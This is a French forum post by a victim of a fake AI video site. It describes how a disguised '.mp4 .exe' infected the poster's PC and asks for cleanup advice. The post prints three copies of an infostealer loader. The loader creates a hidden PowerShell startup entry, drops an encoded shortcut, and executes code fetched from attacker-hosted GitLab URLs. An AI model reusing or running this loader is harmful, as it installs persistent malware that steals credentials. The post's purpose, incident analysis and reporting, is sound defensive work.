J'ai enquêté dessus et je vous partage tout pour avoir votre avis sur ce qu'il me reste à faire && peut-être signaler à des organismes de surveillance de nouveaux virus (puisqu'il n'a été détecté nulle part).
1) La source : le site hxxps://klings-ai.com/ (!!! Ce site est donc malveillant !!!)
-> J'ai voulu tester la feature 'image to video by AI' et ça m'a fait télécharger un .zip contenant un fichier ".mp4 .exe" avec le visuel d'un fichier vidéo classique (et l'extension exe non visible).
-> J'ai extrait le zip puis lancé le fichier quand j'ai vu qu'il s'agissait d'un mp4, avant que mon cerveau réalise la c0nnerie monumentale...
VirusTotal -> https://www.virustotal.com/gui/file/2e5 ... 373cab808a
2) Le fichier a lancé un CMD et fermé mon navigateur. J'ai éteint le PC (au cas où ça soit un ransomware ou autre process continu).
3) J'ai redémarré en mode réparation, et j'ai retrouvé le virus en ligne de commandes, grâce à un .lnk placé dans le répertoire des applications de démarrage. J'ai déplacé le .lnk et le dossier du virus, et tenté de comprendre son action.
4) Redémarrage de Windows et scan avec RogueKiller et Defender -> RAS (même les fichiers du virus sont considérés comme clean)
5) Enquête:
C:\Users\MOI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Window Explorer.lnk -> lance C:\WinExplorer\WindowSecurity.bat
Qui contient
Code : Tout sélectionner
explorer | powershell -ep bypass -w hidden -c C:\WinExplorer\python.exe C:\WinExplorer\vcruntime140.py
Le code python fait appel à un "stealer", mais est obfusqué.
Le code contient du texte en Vietnamien et contient une sorte de poème en chinois insultant les chinois et en faveur des Vietnamiens.
Le code du fichier vcruntime140.py est le suivant:
Code : Tout sélectionner
#import for stealer
import os, json, base64, sqlite3, shutil, requests, glob, re, zipfile, io, datetime, hmac, subprocess
from websocket import create_connection
from base64 import b64decode
from hashlib import sha1, pbkdf2_hmac
from pathlib import Path
from pyasn1.codec.der.decoder import decode
from Crypto.Cipher import AES, DES3
from win32crypt import CryptUnprotectData
from ctypes import windll, byref, create_unicode_buffer, pointer, WINFUNCTYPE
from ctypes.wintypes import DWORD, WCHAR, UINT
#
# other import
#
ERROR_SUCCESS = 0
ERROR_MORE_DATA = 234
RmForceShutdown = 1
@WINFUNCTYPE(None, UINT)
def callback(percent_complete: UINT) -> None:
pass
rstrtmgr = windll.LoadLibrary("Rstrtmgr")
import urllib.request
url = "https://gitlab.com/akedi/xmeta/-/raw/main/stealobf"
startup_folder = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startup_path_bat = os.path.join("C:\\WinExplorer\\", 'WindowSecurity.bat')
rie_startup_path = os.path.join(startup_folder, "Window Explorer.lnk")
code = '''explorer | po"wers"hell -ep byp"as"s -w hi"dd"en -c C:\\W"inExp"lorer\\py"tho"n.exe C:\\WinE"xplorer\\vcrun"time140.py'''
b64data = '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'
open(startup_path_bat, 'w').write(code)
open(rie_startup_path, 'wb').write(base64.b64decode(b64data))
try:
exec(urllib.request.urlopen(url).read())
except:
pass
cvruntime140d.py contient:
Code : Tout sélectionner
#import for stealer
import os, json, base64, sqlite3, shutil, requests, glob, re, zipfile, io, datetime, hmac, subprocess
from websocket import create_connection
from base64 import b64decode
from hashlib import sha1, pbkdf2_hmac
from pathlib import Path
from pyasn1.codec.der.decoder import decode
from Crypto.Cipher import AES, DES3
from win32crypt import CryptUnprotectData
from ctypes import windll, byref, create_unicode_buffer, pointer, WINFUNCTYPE
from ctypes.wintypes import DWORD, WCHAR, UINT
#
# other import
#
ERROR_SUCCESS = 0
ERROR_MORE_DATA = 234
RmForceShutdown = 1
@WINFUNCTYPE(None, UINT)
def callback(percent_complete: UINT) -> None:
pass
rstrtmgr = windll.LoadLibrary("Rstrtmgr")
import urllib.request
url = "https://gitlab.com/akedi/xmeta/-/raw/main/xwo.loadpy"
startup_folder = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startup_path_bat = os.path.join("C:\\WinExplorer\\", 'WindowSecurity.bat')
rie_startup_path = os.path.join(startup_folder, "Window Explorer.lnk")
code = '''explorer | po"wers"hell -ep byp"as"s -w hi"dd"en -c C:\\W"inExp"lorer\\py"tho"n.exe C:\\WinE"xplorer\\vcrun"time140.py'''
b64data = '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'
open(startup_path_bat, 'w').write(code)
open(rie_startup_path, 'wb').write(base64.b64decode(b64data))
try:
exec(urllib.request.urlopen(url).read())
except:
pass
On remarque que l'exe fait appel à https://gitlab.com/akedi/depvol/-/raw/main/2.ps1 qui a exactement fait ce qui se trouve sur mon PC:
- DL et création d'un zip WinHelper.zip qui est décompressé et contient l'env python (source du zip: https://www.dropbox.com/scl/fi/0dmlttqj ... 6hj53&dl=1)
- exec des fichiers vcruntime140.py et vcruntime140d.py
Contenu de Gimport.dat :
Code : Tout sélectionner
#import for stealer
import os, json, base64, sqlite3, shutil, requests, glob, re, zipfile, io, datetime, hmac, subprocess
from websocket import create_connection
from base64 import b64decode
from hashlib import sha1, pbkdf2_hmac
from pathlib import Path
from pyasn1.codec.der.decoder import decode
from Crypto.Cipher import AES, DES3
from win32crypt import CryptUnprotectData
from ctypes import windll, byref, create_unicode_buffer, pointer, WINFUNCTYPE
from ctypes.wintypes import DWORD, WCHAR, UINT
#
# other import
#
ERROR_SUCCESS = 0
ERROR_MORE_DATA = 234
RmForceShutdown = 1
@WINFUNCTYPE(None, UINT)
def callback(percent_complete: UINT) -> None:
pass
rstrtmgr = windll.LoadLibrary("Rstrtmgr")
import urllib.request
url = "%up%"
startup_folder = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startup_path_bat = os.path.join("C:\\WinExplorer\\", 'WindowSecurity.bat')
rie_startup_path = os.path.join(startup_folder, "Window Explorer.lnk")
code = '''explorer | po"wers"hell -ep byp"as"s -w hi"dd"en -c C:\\W"inExp"lorer\\py"tho"n.exe C:\\WinE"xplorer\\vcrun"time140.py'''
b64data = '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'
open(startup_path_bat, 'w').write(code)
open(rie_startup_path, 'wb').write(base64.b64decode(b64data))
try:
exec(urllib.request.urlopen(url).read())
except:
pass
Et que me conseillez-vous de faire à présent:
- pour m'assurer que le PC n'est plus corrompu
- pour réduire l'impact des données éventuellement volées (mots de passes ? quoi d'autre?)
Merci!